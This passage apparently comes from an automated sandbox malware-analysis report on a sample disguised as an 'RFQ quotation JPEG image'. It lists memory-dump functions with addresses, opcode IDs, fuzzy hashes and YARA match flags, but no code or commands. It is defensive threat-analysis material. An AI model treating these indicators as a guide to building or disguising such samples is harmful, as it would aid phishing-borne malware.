                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fb01f472eaedcda33d8ca0134d6667ed882a6786a2086abb7f8973d32e16d7cf
                          • Instruction ID: 0fa662410333fcf14c121c9d0e31bc8324e78ed254d2f74d84c0aed47b2f93b4
                          • Opcode Fuzzy Hash: fb01f472eaedcda33d8ca0134d6667ed882a6786a2086abb7f8973d32e16d7cf
                          • Instruction Fuzzy Hash: CB31D475E012099FDB45CFA8D884AEEBBF5FF49310F14916AE814AB361DB70A940CF90
                          Function 06546680 Relevance: .1, Instructions: 87COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1a65ada4af2fe8f32104eb984f851f429c627b9a51e9a11dd4ac73ad5aeb1d2a
                          • Instruction ID: 97822bb9af6d27da726c17923042aa4d9a0c87052de4a9dd0656ffe54c0a3ce4
                          • Opcode Fuzzy Hash: 1a65ada4af2fe8f32104eb984f851f429c627b9a51e9a11dd4ac73ad5aeb1d2a
                          • Instruction Fuzzy Hash: DD316DB5E012189FCB05DFA9D8546EEBBB2FF88310F10806AE516A7364DB315E41CFA1
                          Function 06546A90 Relevance: .1, Instructions: 87COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cc37bee77eb1aefdca01ff072d209d5dc7ba97b58cb08db27587a62ed484bcba
                          • Instruction ID: 28720eaf5379d7ecbbaecd0cbee84da77fe8fd5d7e539d339f6f16a40ecc9330
                          • Opcode Fuzzy Hash: cc37bee77eb1aefdca01ff072d209d5dc7ba97b58cb08db27587a62ed484bcba
                          • Instruction Fuzzy Hash: A0311170E00229CFDB44DFAAD944BEEBBB2BF8A318F0495A9E414A7250D7749944CF90
                          Function 01418DC8 Relevance: .1, Instructions: 85COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: de96914292aeb11e7ce2c95e5c1cd41e55556e2b2ccca6dd21749ba5242ad964
                          • Instruction ID: e5c7bda23bf42785330c6126654c57c4138ba38e1063d95548d66c8dcbf3be73
                          • Opcode Fuzzy Hash: de96914292aeb11e7ce2c95e5c1cd41e55556e2b2ccca6dd21749ba5242ad964
                          • Instruction Fuzzy Hash: AE3158B4E0120AEFEB04DF99D5487AEBBB2FB89318F108466D105AB368CB785945CF51
                          Function 06547920 Relevance: .1, Instructions: 84COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dc00bc1836caa17d647725774922c25704ced5f0d29166ab3e2222d0cf1f219d
                          • Instruction ID: c194c10a0978560a0bd58a2937769b81c8d418adcc50dd3ed6e7ac4164db163b
                          • Opcode Fuzzy Hash: dc00bc1836caa17d647725774922c25704ced5f0d29166ab3e2222d0cf1f219d
                          • Instruction Fuzzy Hash: F3311074E04209DFDB44DFAAD4446AEBBF6FB8D304F1085A5D819A7344DB389A81CF90
                          Function 0650DD88 Relevance: .1, Instructions: 81COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 02f23fc6d385a3aa399d6b594730c070095cdcfa644195e54c4fc94dd8a6fbdb
                          • Instruction ID: 03125a88ff57865ba2ce287ae0dfa07d2672415831cb11ab303b67f715b9e829
                          • Opcode Fuzzy Hash: 02f23fc6d385a3aa399d6b594730c070095cdcfa644195e54c4fc94dd8a6fbdb
                          • Instruction Fuzzy Hash: BB31C275E012099FDB44CF99D484AEEBBF2FF88310F10912AE915AB364DB70A940CF90
                          Function 065027A0 Relevance: .1, Instructions: 78COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cc80646266301aa94616677a2be52fc7717cf2cf9f6390aaddf7da717783ca48
                          • Instruction ID: 94703f99c327b705bc0e2d3570cf0324c5a45c80bc01b7783dfe16574b9030b2
                          • Opcode Fuzzy Hash: cc80646266301aa94616677a2be52fc7717cf2cf9f6390aaddf7da717783ca48
                          • Instruction Fuzzy Hash: 0D219434F10A19CFCB44EF68D5448AEB7B6FF89700B50412AD516A7364EF34AA46CBE1
                          Function 06502792 Relevance: .1, Instructions: 77COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 43c7695f20dcad56549561e90a746630996aa2732c6188f7f60d87685229c17e
                          • Instruction ID: c7cb6fdbd88d9ae41b3673c407dfb1def600e350436cbd5caeb2669c995a7508
                          • Opcode Fuzzy Hash: 43c7695f20dcad56549561e90a746630996aa2732c6188f7f60d87685229c17e
                          • Instruction Fuzzy Hash: 4521D634A006198FDB44EF68D9448AEB7B5FF89300F00416AE5159B3A4EB30AE06CFE1
                          Function 0141D128 Relevance: .1, Instructions: 76COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9228d44e05efe9d017a9b27eecad99915a0786a3c0a1806c834ab06caea5c69e
                          • Instruction ID: 034781e30f9feae193892a4d767ed96194bdef5f3f6a72a50ae9f7da5a60d95a
                          • Opcode Fuzzy Hash: 9228d44e05efe9d017a9b27eecad99915a0786a3c0a1806c834ab06caea5c69e
                          • Instruction Fuzzy Hash: E02128B4E05219DBDB04DFE9D8483EEBBF2FB88310F10842AD515A3368DB7859418B50
                          Function 0122D5E0 Relevance: .1, Instructions: 75COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2086969556.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_122d000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3e79c78435df817bf1d4932c4421e9255e5478cc6e10cff3501913f1243139bf
                          • Instruction ID: 275ba4703b4421a857ddc88975b8631a674b37b3caa53143b9b054d31e6ed571
                          • Opcode Fuzzy Hash: 3e79c78435df817bf1d4932c4421e9255e5478cc6e10cff3501913f1243139bf
                          • Instruction Fuzzy Hash: 552148B1514248EFDB25DF98E9C0B2ABF65FB88320F24C568E90D0B247C336D415CAA1
                          Function 06549EF8 Relevance: .1, Instructions: 75COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a4aff9ca6836815054e1812ef619b8fc7474a20cfaf1fe9dd7a86f3fac69e96e
                          • Instruction ID: ab36c7a058be1574e93e8ec460043e4731f90f134e5fcc043c2e975782acb3a8
                          • Opcode Fuzzy Hash: a4aff9ca6836815054e1812ef619b8fc7474a20cfaf1fe9dd7a86f3fac69e96e
                          • Instruction Fuzzy Hash: C1217F31A01218AFDB15DF68C444ADEBBB6FF8D720F244169E911A7390DB319845CB90
                          Function 0654D7C0 Relevance: .1, Instructions: 75COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 68cc0af63d51cf2db371e1cba5aee5e25ed370ab162934a800f4da23247e5f17
                          • Instruction ID: 3d8f3e717fac3bb0e59fd5d8ae20f10b9bb443ac673fd41443e884759e863a9d
                          • Opcode Fuzzy Hash: 68cc0af63d51cf2db371e1cba5aee5e25ed370ab162934a800f4da23247e5f17
                          • Instruction Fuzzy Hash: 4E214571E00219DFEB90EAB8C904BBEBBB4AF44254F1085A6D919DB290E734CA44CB91
                          Function 06549882 Relevance: .1, Instructions: 75COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4c320a88159fa63b4154885ec2c861fd161f18bca9755f40c3e72df96e6b2a5a
                          • Instruction ID: a3b80cd7fc9833d2a47611aa79181e965aa18a3057b9a762bba57c937f0dc29a
                          • Opcode Fuzzy Hash: 4c320a88159fa63b4154885ec2c861fd161f18bca9755f40c3e72df96e6b2a5a
                          • Instruction Fuzzy Hash: 5421F2706016159FD760EB28E8057AEBBFAFF88300F508938E019D7685DB795D458BE0
                          Function 0123D030 Relevance: .1, Instructions: 74COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2086996421.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_123d000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0f62a962bbd9fa73f6f3c1af6bdfc3a22c5ee36d4c8e215339f64bebfd6232e9
                          • Instruction ID: da599b484067bdc17547cecf532e13923f6b2a01262a2cff39d4c78771030402
                          • Opcode Fuzzy Hash: 0f62a962bbd9fa73f6f3c1af6bdfc3a22c5ee36d4c8e215339f64bebfd6232e9
                          • Instruction Fuzzy Hash: 8B2125B1514208DFCB12DF98D9C4B26FF65FBC4714F64C569E9091B246C336D816CAA2
                          Function 06548D90 Relevance: .1, Instructions: 73COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8479aa47fec98eb291113aef2e860101ec4577da020de7b3d59e86a55cb3bcbd
                          • Instruction ID: 6f4a5d51048c3161362fb63d316593ac50203169d6e8797e0623e0585492fd9a
                          • Opcode Fuzzy Hash: 8479aa47fec98eb291113aef2e860101ec4577da020de7b3d59e86a55cb3bcbd
                          • Instruction Fuzzy Hash: 9E213770E05249EFDB84EFA8E8886ACBBB1FF49304F1495EAD418A7250C7748A50DF40
                          Function 0650EAE8 Relevance: .1, Instructions: 73COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a00f24b25ad8ae7a15463d688671a19ae4c09535e0b552ff0a3be3e076f20105
                          • Instruction ID: ccccaade2937de895187a418319b9bacde639549031b693ed114965a9f77317b
                          • Opcode Fuzzy Hash: a00f24b25ad8ae7a15463d688671a19ae4c09535e0b552ff0a3be3e076f20105
                          • Instruction Fuzzy Hash: C121D5308093099FCB42DFF4D8054D9BFB4FF4A320F24859BE444AB292E775AA55CBA1
                          Function 0650F939 Relevance: .1, Instructions: 67COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8e5480f289dd37afabac0e3672de6bc995963bf250fa9362e87ef91a7df22a0
                          • Instruction ID: c73e7840e40a0cabe805ff0520912d41066ab22a231fa5c211efc1ee541cdc5f
                          • Opcode Fuzzy Hash: d8e5480f289dd37afabac0e3672de6bc995963bf250fa9362e87ef91a7df22a0
                          • Instruction Fuzzy Hash: 1221E474D04209AFDB80CFA9D9449BEBBF9FB49300F04855AE858E7351D7349A51CFA0
                          Function 0650BDC0 Relevance: .1, Instructions: 64COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 372c22be0282f9925ec099ff8556ae80dbc11c84a624d57a3323abb60e424308
                          • Instruction ID: f01b188dab19bd3dd1c0ca91b64a5195ccbf12aacd12f7aaa28a9ce970341734
                          • Opcode Fuzzy Hash: 372c22be0282f9925ec099ff8556ae80dbc11c84a624d57a3323abb60e424308
                          • Instruction Fuzzy Hash: FA31F674A04229CFEBA0CF58D988BADB7B2FB49300F0081A5D44DAB684DB759E85CF00
                          Function 0654ACB0 Relevance: .1, Instructions: 63COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f60135f0f8b7f9531286e5666337645ffa084da3da25c62a9aec37a89b9c4267
                          • Instruction ID: bb29018a6d64bfe726536cfc5df1220d33bd1e33633f1c06b234aa27229deff3
                          • Opcode Fuzzy Hash: f60135f0f8b7f9531286e5666337645ffa084da3da25c62a9aec37a89b9c4267
                          • Instruction Fuzzy Hash: C711E934B412119FDBA0AF74C845BEA7BF2BB8C312F104569E505DB284DB31C941CBA0
                          Function 0650C1A7 Relevance: .1, Instructions: 58COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5e519cd73feba4e492248b9cde13fadec50072f572a6737cb90def527fef2b73
                          • Instruction ID: 0d5dc095d01e6d851bab1f7f8e40c49c63dac9a03abf8751f81d8287dccf5deb
                          • Opcode Fuzzy Hash: 5e519cd73feba4e492248b9cde13fadec50072f572a6737cb90def527fef2b73
                          • Instruction Fuzzy Hash: 5021BC74A0421DCFEBA4CF68D988BADB7B1FB49304F5085A5D40AA7784DB759D85CF00
                          Function 0141E520 Relevance: .1, Instructions: 58COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 69081848a03dd6c55a321a0a4718eaade7478232c6820e1dd1dddad94c54650f
                          • Instruction ID: 34611ff73a055aa50c37ae4cc563968b7efd5586bad71bc8d65392f7bad6882d
                          • Opcode Fuzzy Hash: 69081848a03dd6c55a321a0a4718eaade7478232c6820e1dd1dddad94c54650f
                          • Instruction Fuzzy Hash: DD113774D01209CBDB15CFD9D4446EEBBF6FF89310F14802AD905B3228E7745A45CBA4
                          Function 063E1A7E Relevance: .1, Instructions: 57COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111378217.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: true
                          • Associated: 00000000.00000002.2111165061.0000000006380000.00000004.08000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6380000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 78b2755c07b3f7386323f203947d3c8bac1b6da9a2f2ed2219bd07534f429633
                          • Instruction ID: 3ea14fbe3f06507bc279a1bfe6a4430b03df191fb97379f981d8cc347e1effed
                          • Opcode Fuzzy Hash: 78b2755c07b3f7386323f203947d3c8bac1b6da9a2f2ed2219bd07534f429633
                          • Instruction Fuzzy Hash: 5121B674A5522A8FCB61DF24D894BADB7B6FB48300F1085DAE50DA7355C7349E80CF50
                          Function 0122D5DB Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2086969556.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_122d000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                          • Instruction ID: b1d2b6723ac4b1ed0062190b51bd883da191f3b54dfed12bbc87109a2027b8ee
                          • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                          • Instruction Fuzzy Hash: 81110376504284DFCB26CF44D5C4B2ABF72FB84320F24C1A9D9090B257C33AD45ACBA1
                          Function 063E1AE1 Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111378217.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: true
                          • Associated: 00000000.00000002.2111165061.0000000006380000.00000004.08000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6380000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 55f0e362e28799950c3a8b3e14e1f9c80fcd7c81539ded3fa8448a054696fb4a
                          • Instruction ID: 54796e5b83722f8af56b9cd3ffeca4af7e6b33e318660f1599e35615fc5d693c
                          • Opcode Fuzzy Hash: 55f0e362e28799950c3a8b3e14e1f9c80fcd7c81539ded3fa8448a054696fb4a
                          • Instruction Fuzzy Hash: E1219374A542298FCB65DF28D898BADB7B6FB48300F5045D9E50DA7394CB349E84CF50
                          Function 06509F4A Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b774904a4e6e55b3e4763ebcde8e93cf3f0e429885d4d58cf08aeb1a06bf8b0c
                          • Instruction ID: d97b4ebb276253092b84a502670147fe9930de5447fd948ff2f96ba70f529592
                          • Opcode Fuzzy Hash: b774904a4e6e55b3e4763ebcde8e93cf3f0e429885d4d58cf08aeb1a06bf8b0c
                          • Instruction Fuzzy Hash: BE11A970D0A348EFCB82DFE8D80569DBBB8EF45210F0081DAE444D7296D635DA05DB91
                          Function 0654AA29 Relevance: .1, Instructions: 55COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5ffbbcb4a55a242f5ce7ee78b66a5fef43c2a3f0496be277af52ecced71eff8c
                          • Instruction ID: 0d7141f62d68dd4128becb381e2d7b1c91fffabb2b6d463c7014b5901a807b43
                          • Opcode Fuzzy Hash: 5ffbbcb4a55a242f5ce7ee78b66a5fef43c2a3f0496be277af52ecced71eff8c
                          • Instruction Fuzzy Hash: 68216F78A42219AFDB44DFA8D594EADB7F2BF49304F204098E806AB365CB34ED41CF50
                          Function 0123D02B Relevance: .1, Instructions: 55COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2086996421.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_123d000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 42ffd1060d4716d88ab02c1f84f02b90d98ab478aa7c1853a2e815d1f450a477
                          • Instruction ID: d9490ab564795c61f6baaf20b4b1727f5b7aea4b0c3be09a3ddde6d4d873a094
                          • Opcode Fuzzy Hash: 42ffd1060d4716d88ab02c1f84f02b90d98ab478aa7c1853a2e815d1f450a477
                          • Instruction Fuzzy Hash: AA1122B6404284CFCB12CF14DAC0B16FF71FB84714F24C2AAD9490B656C33AD41ACBA2
                          Function 0654A8E0 Relevance: .1, Instructions: 54COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bf8ae361f079ea1ee97abe5f91b1c45d6eebe9673beee0765fe875f2f77c0fed
                          • Instruction ID: c52f83b4a8faeca8e4f0a8f0df6a18ee5516e71f232f1eb8fdcdcdad68659efd
                          • Opcode Fuzzy Hash: bf8ae361f079ea1ee97abe5f91b1c45d6eebe9673beee0765fe875f2f77c0fed
                          • Instruction Fuzzy Hash: F2019E353893916FC3078F299C5088A7FB9AF8B22131641EBF954CB2A3D666C805C7A1
                          Function 063E1A29 Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111378217.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: true
                          • Associated: 00000000.00000002.2111165061.0000000006380000.00000004.08000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6380000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: be546554369fddbbd64aafcb1edd9105c7322bd2116c9e8ba3324dbae2d99f5b
                          • Instruction ID: 12f2d4985fbc2e751287f53ded9bdc9da8982e612a61db8afc7eff5a6798b6c8
                          • Opcode Fuzzy Hash: be546554369fddbbd64aafcb1edd9105c7322bd2116c9e8ba3324dbae2d99f5b
                          • Instruction Fuzzy Hash: C521D574A502298FCBA5DF28C894BADB7B6FB89200F1085D9E50DA7794CB349E84CF50
                          Function 0650FCD0 Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bee0bcaeb618eaf78615dd2ee4bcdf6c22a900732fa55c5d747857877b01fd5c
                          • Instruction ID: d93c6c4e77b3c0c9952da754e9a7aa4594784389275ab4c34b097319bca0cfc6
                          • Opcode Fuzzy Hash: bee0bcaeb618eaf78615dd2ee4bcdf6c22a900732fa55c5d747857877b01fd5c
                          • Instruction Fuzzy Hash: 9711F5B4D05209DFDB58CFA8C4855AEBFB5FF49300F2081AAE904AB365D7309A81DF91
                          Function 06546FC7 Relevance: .1, Instructions: 52COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2d494dac57cfa48da16758209b88a7be6606f7150035bc1970359715f2ac8994
                          • Instruction ID: 76b6bbcd7238fcc04241c7ca3bd13fa3ec5b31b05ad443ea85510e196428d8ba
                          • Opcode Fuzzy Hash: 2d494dac57cfa48da16758209b88a7be6606f7150035bc1970359715f2ac8994
                          • Instruction Fuzzy Hash: 3A21C674A15228DFDB54DF68D884B9DB7F2FB89310F1081A9E409A7348DB385E81CF51
                          Function 06501B19 Relevance: .1, Instructions: 52COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e86021694f753d26e032d55b9c95fccc3b5c94d909eb96c28c2acd6f49811ffa
                          • Instruction ID: 89bf27aa065f3d9ee29bdea4b8e40d1b8a03ea572d0a0c254d3b9cdf87a516f6
                          • Opcode Fuzzy Hash: e86021694f753d26e032d55b9c95fccc3b5c94d909eb96c28c2acd6f49811ffa
                          • Instruction Fuzzy Hash: 95110E317003409FD325AB78C814A3A7BA2EBCA310F0445ADE5528B3D2CB31E803CB92
                          Function 0654A908 Relevance: .1, Instructions: 51COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 16de78af37d612f4b1e5ef301a62bf47423ba3c759edcdc7ca7da473abd82669
                          • Instruction ID: 6008fccb3e87a0eadd984bf5538a65d696f42e2c3c2e2feceee291b02f2f0bc2
                          • Opcode Fuzzy Hash: 16de78af37d612f4b1e5ef301a62bf47423ba3c759edcdc7ca7da473abd82669
